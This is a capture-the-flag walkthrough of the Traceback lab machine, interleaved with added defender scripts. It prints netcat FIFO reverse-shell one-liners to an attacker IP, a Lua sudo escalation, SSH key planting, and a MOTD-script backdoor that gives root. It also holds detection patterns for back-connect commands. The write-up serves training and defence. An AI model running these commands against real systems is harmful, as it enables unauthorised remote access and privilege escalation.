# Traceback

## Nmap

```
sudo nmap 10.10.10.181 -p- -sS -sV

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Jumping straight into port 80 we are presented with the page below:

![http://10.10.10.181/](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-6d96e2e48b5e7c5e929e3a547271f5f208f32d8f%2Fimage.png?alt=media)

Viewing the source of this web page shows that the hacker has left a hint: 'Some of the best web shells that you might need ;)'.

![view-source:http://10.10.10.181/](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-4c8420bb83838e93ce14afb9f0bde89c11feaa55%2Fimage.png?alt=media)

From here I executed dirsearch.py with the CommonBackdoors-PHP.fuzz.txt wordlist from SecLists, which can be found here: <https://github.com/danielmiessler/SecLists>.

```
sudo python3 dirsearch.py -u http://10.10.10.181 -w /usr/share/seclists/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txt --full-url -t 75
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-5afb4e7264039d5c1bbf535d495368d12c4262de%2Fimage.png?alt=media)

dirsearch.py finds smevk.php from the wordlist. Browsing to the PHP web shell shows the following:

![http://10.10.10.181/smevk.php](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-aa48cca9f3db4e78c8e6b08524ffddcf062b87aa%2Fimage.png?alt=media)

Looking up the credentials for the SmEvK web shell leads to the following GitHub link: <https://github.com/TheBinitGhimire/Web-Shells/blob/master/PHP/smevk.php>

This shows that the defaults are `admin:admin`.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-5d47598e9d53c8e440ee1967ba04748892a998e8%2Fimage.png?alt=media)

Once logged in we get the page below:

![http://10.10.10.181/smevk.php](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-43017812a8a205498fa7e3771bf6113130742af8%2Fimage.png?alt=media)

Heading over to the 'console' tab and running `which nc` shows that `netcat` is installed on the target. I set up a local listener on my attacking machine.

```
sudo nc -lvp 80
```

Then I executed the following command in the web shell to gain a full reverse shell.

```
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.29 80 >/tmp/f
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-9cc735ed18fc985343c6a8e77ae652e9191af9a0%2Fimage.png?alt=media)
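The web shell above was found by brute-forcing names from a backdoor wordlist; the defender's side of the same step is checking the web root for PHP files that call the code-execution functions such shells rely on. The script below is an added example and not code from the write-up or from the SmEvK project. The function names, the marker pattern and the fixture files under the temporary web root are all constructed for the demonstration; the pattern is a generic triage filter, not a signature of smevk.php.

```shell
#!/bin/sh
# Added defender example (not from the write-up): list PHP files under a web
# root that call the code/command-execution functions dropped web shells rely
# on. Function names and the marker pattern are assumptions, not a signature
# of smevk.php; the fixture files are constructed for the demonstration.

# Functions that turn data into code or OS commands; a hit is a triage item,
# not proof of compromise (legitimate admin pages call system() too).
WEBSHELL_FUNCS='(eval|assert|base64_decode|shell_exec|passthru|system|exec|proc_open|popen)\('

# Usage: scan_php_webshells /var/www/html
# Prints "<file><TAB><matched functions>" for every PHP file with a hit.
scan_php_webshells() {
    webroot="$1"
    find "$webroot" -type f \( -name '*.php' -o -name '*.phtml' -o -name '*.phar' \) \
        | sort | while read -r f; do
        hits=$(grep -oE "$WEBSHELL_FUNCS" "$f" 2>/dev/null | sort -u | tr '\n' ' ')
        if [ -n "$hits" ]; then
            printf '%s\t%s\n' "$f" "$hits"
        fi
    done
}

# Constructed fixture: a harmless page, an admin page that shells out, and a
# file shaped like a dropped shell (the eval marker has no payload on purpose).
make_webroot_fixture() {
    dir=$(mktemp -d)
    mkdir -p "$dir/assets"
    printf '<?php echo "Welcome"; ?>\n' > "$dir/index.php"
    printf '<?php echo shell_exec("uptime"); ?>\n' > "$dir/assets/status.php"
    printf '<?php eval(base64_decode("")); // constructed marker ?>\n' > "$dir/backdoor.php"
    echo "$dir"
}

# Stand-alone run: scan the directory given as an argument, else the fixture.
if [ "$#" -ge 1 ]; then
    scan_php_webshells "$1"
else
    demo=$(make_webroot_fixture)
    scan_php_webshells "$demo"
    rm -rf "$demo"
fi
```

On a real host run it against the served directory (for example `sh scan.sh /var/www/html`) and compare each hit against the deployed code: status.php-style pages that legitimately shell out will show up next to a dropped shell, so the output is a review list, not a verdict.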

Checking the users in `/home/` we find sysadmin and webadmin. The user webadmin has a note.txt file on their desktop.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-17e54c5ee7afe9bb4e2d76dc4d1c9e89fc9fe636%2Fimage.png?alt=media)

I was unable to find the tool mentioned in the note. I then checked sudo privileges with `sudo -l` and noted that we can run `/home/sysadmin/luvit` as the user sysadmin without specifying a password.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-2aaa9aff48b763e1df8a1f5d55e004a77217a962%2Fimage.png?alt=media)

Running the following command starts the binary, but it seems to throw an exception and kick us out immediately.

```
sudo -u sysadmin /home/sysadmin/luvit
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-17f1be534d34e3a8abdcc0bbaf6fe2da232b0d4b%2Fimage.png?alt=media)

Looking up Lua on [GTFOBins](https://gtfobins.github.io/gtfobins/lua/) shows that it may be able to spawn a system shell with the privileges of the executing user.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-2b970f6fe8ab3b9b14f4388593838aefb94d920c%2Fimage.png?alt=media)

Using this, I run the following command, replacing 'lua' with 'luvit'.

```
sudo -u sysadmin /home/sysadmin/luvit -e 'os.execute("/bin/sh")'
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-e1adb62e3ab3fe59462d9e7937abdf1edc6d44db%2Fimage.png?alt=media)

This gives us a shell as the user 'sysadmin'. Next, use the following command to upgrade the shell:

```
/usr/bin/script -qc /bin/bash /dev/null
```
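The escalation from webadmin to sysadmin rests on a single NOPASSWD sudo rule whose command is an interpreter living under a user's home directory. The script below is an added example, not code from the write-up, that reads sudoers-format text and flags exactly that class of rule. The sudoers sample is constructed to mirror the `sudo -l` result shown on the box (the exact sudoers line is not on the page), and the three risk categories, the interpreter list and the function name are my own assumptions.

```shell
#!/bin/sh
# Added defender example (not from the write-up): flag NOPASSWD sudo rules that
# hand a user a path to a shell, in the way the webadmin -> sysadmin rule does.
# The sudoers text below is a constructed sample modelled on the sudo -l output
# shown in the write-up; the rule categories are assumptions of this example.

# Reads sudoers-format text from the files given (or stdin) and prints
# "<user><TAB><command><TAB><reason>" for each NOPASSWD command worth reviewing.
# Backslash continuation lines are not joined; pre-process with visudo -c -f if needed.
audit_nopasswd_rules() {
    awk '
        /^[ \t]*#/ || /^[ \t]*$/ { next }          # comments and blank lines
        index($0, "NOPASSWD:") == 0 { next }      # only password-less rules
        {
            rest = substr($0, index($0, "NOPASSWD:") + 9)
            n = split(rest, cmds, ",")
            for (i = 1; i <= n; i++) {
                gsub(/^[ \t]+|[ \t]+$/, "", cmds[i])
                split(cmds[i], words, " ")
                bin = words[1]
                reason = ""
                if (bin == "ALL")
                    reason = "NOPASSWD ALL is an unrestricted shell"
                else if (bin ~ /^\/home\//)
                    reason = "command lives under /home, where a non-admin user controls the file"
                else if (bin ~ /(^|\/)(lua[0-9.]*|luvit|python[0-9.]*|perl|ruby|node|sh|bash|dash)$/)
                    reason = "interpreter can spawn a shell (os.execute, system, ...)"
                if (reason != "")
                    printf "%s\t%s\t%s\n", $1, bin, reason
            }
        }' "$@"
}

# Constructed sample: the webadmin rule mirrors the box, the others are filler
# to show a rule that passes (deploy) and two more that should not.
SUDOERS_SAMPLE='# constructed sample, modelled on the rule sudo -l showed on the box
Defaults        env_reset
root     ALL=(ALL:ALL) ALL
webadmin ALL=(sysadmin) NOPASSWD: /home/sysadmin/luvit
deploy   ALL=(root) NOPASSWD: /usr/bin/systemctl restart myapp
ops      ALL=(ALL) NOPASSWD: ALL
dev      ALL=(root) NOPASSWD: /usr/bin/python3'

# Stand-alone run: audit the files given as arguments, else the sample.
if [ "$#" -ge 1 ]; then
    audit_nopasswd_rules "$@"
else
    printf '%s\n' "$SUDOERS_SAMPLE" | audit_nopasswd_rules
fi
```

On a real host the input is the live policy, for example `sudo cat /etc/sudoers /etc/sudoers.d/* | audit_nopasswd_rules`. The fix for the luvit-style finding is the usual one: move the binary to a root-owned path, or replace the blanket rule with a wrapper script that takes no interpreter arguments.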

From here I opted to gain `SSH` access. As we do not know the sysadmin user's password, I will instead drop the contents of my attacking machine's `id_rsa.pub` into the `/home/sysadmin/.ssh/authorized_keys` file.

If you do not have an `id_rsa.pub` file on the attacking machine, run the following command and hit enter on all options.

```
ssh-keygen -t rsa
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-01db10a6f021f72cb90789a06249eaa72d6b26d3%2Fimage.png?alt=media)

Then cat the contents of `id_rsa.pub`.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-714b303ebc06cc739e471d4ca191688825ecf854%2Fimage.png?alt=media)

Then echo it into the `authorized_keys` file on the target machine.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-79db7ca58d7bc149092f7e182dcc45bd4e7edc3b%2Fimage.png?alt=media)

We can then log into `SSH` as the user sysadmin.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-562fb58f49f8b134f78dadd2cbdc262630bf740e%2Fimage.png?alt=media)

We also see that the hacker has altered the MOTD banner shown at login. We can check the permissions of the scripts that generate it in `/etc/update-motd.d/`.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-4c032dc697a97f1791068615f7aae042a8075270%2Fimage.png?alt=media)

As we have write permissions over these files, I will simply inject a `netcat` reverse shell into the first script run, which is 00-header.

Set a `netcat` listener on the attacking machine, then run the following command on the target machine from within `/etc/update-motd.d/`:

```
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.29 80 >/tmp/f' >> 00-header
```

Once completed, log out of `SSH` and back in to trigger execution. The login should hang and fail to complete.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-cc4149f693a36d2dd7e4791d70a256f4b5cebb7c%2Fimage.png?alt=media)

This results in a root shell on the `netcat` listener.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-860b9213e004d1ec9221f8224b74c736b411cde9%2Fimage.png?alt=media)
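The root shell comes from a property of `/etc/update-motd.d/`: Ubuntu's pam_motd runs every script there as root on each login, so a script that a non-root user can write to is a root-execution path. The script below is an added example, not code from the write-up, that audits such a directory for non-root ownership, group/world write bits and the back-connect line appended above. The function name, the marker pattern and the fixture directory are constructed for the demonstration; the fixture reproduces the page's appended line only as file content to be detected.

```shell
#!/bin/sh
# Added defender example (not from the write-up): audit an update-motd.d style
# directory. Ubuntu runs every script in it as root at login, so a script that
# a non-root user can write to is a root-execution path. The function also
# flags scripts containing the back-connect plumbing the write-up appends.
# Script names, the marker pattern and the fixture are constructed for this demo.

# Usage: audit_motd_dir DIR [expected_owner]   (default owner: root)
# Prints one finding per line; returns 1 if anything was flagged, else 0.
audit_motd_dir() {
    dir="$1"
    want_owner="${2:-root}"
    findings=0
    for f in "$dir"/*; do
        [ -f "$f" ] || continue
        perms=$(ls -ld "$f" | cut -c1-10)          # e.g. -rwxrwxr-x
        owner=$(ls -ld "$f" | awk '{print $3}')
        if [ "$owner" != "$want_owner" ]; then
            echo "OWNER    $f is owned by $owner, expected $want_owner"
            findings=$((findings + 1))
        fi
        # columns 6 and 9 of the mode string are the group and other write bits
        if [ "$(echo "$perms" | cut -c6)" = "w" ] || [ "$(echo "$perms" | cut -c9)" = "w" ]; then
            echo "WRITABLE $f has mode $perms"
            findings=$((findings + 1))
        fi
        if grep -qE 'mkfifo|/dev/tcp/|(^|[^a-z])nc[[:space:]]|ncat|sh -i|bash -i' "$f"; then
            echo "CONTENT  $f contains shell back-connect markers"
            findings=$((findings + 1))
        fi
    done
    [ "$findings" -eq 0 ]
}

# Constructed fixture: three banner scripts, two of them writable, one of them
# carrying the line the write-up appends (fixture content only).
make_motd_fixture() {
    dir=$(mktemp -d)
    printf '#!/bin/sh\nprintf "Welcome\\n"\n' > "$dir/00-header"
    printf '#!/bin/sh\nuptime\n' > "$dir/10-uptime"
    printf '#!/bin/sh\nprintf "Run motd-help for details\\n"\n' > "$dir/50-help"
    chmod 755 "$dir"/*
    chmod 775 "$dir/00-header"          # group-writable, as on the box
    chmod 777 "$dir/50-help"            # world-writable
    echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.29 80 >/tmp/f' >> "$dir/00-header"
    echo "$dir"
}

# Stand-alone run: audit the directory given as an argument, else the fixture
# (owned by the current user, so the owner check is pointed at that user).
if [ "$#" -ge 1 ]; then
    audit_motd_dir "$@"
else
    demo=$(make_motd_fixture)
    audit_motd_dir "$demo" "$(id -un)" || true
    rm -rf "$demo"
fi
```

On a live system run `audit_motd_dir /etc/update-motd.d` as root; the expected clean state is every script owned by root with mode 755, and the remediation for a finding like the one on this box is `chown root:root` plus `chmod 755` followed by a review of the script body against the package's copy.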
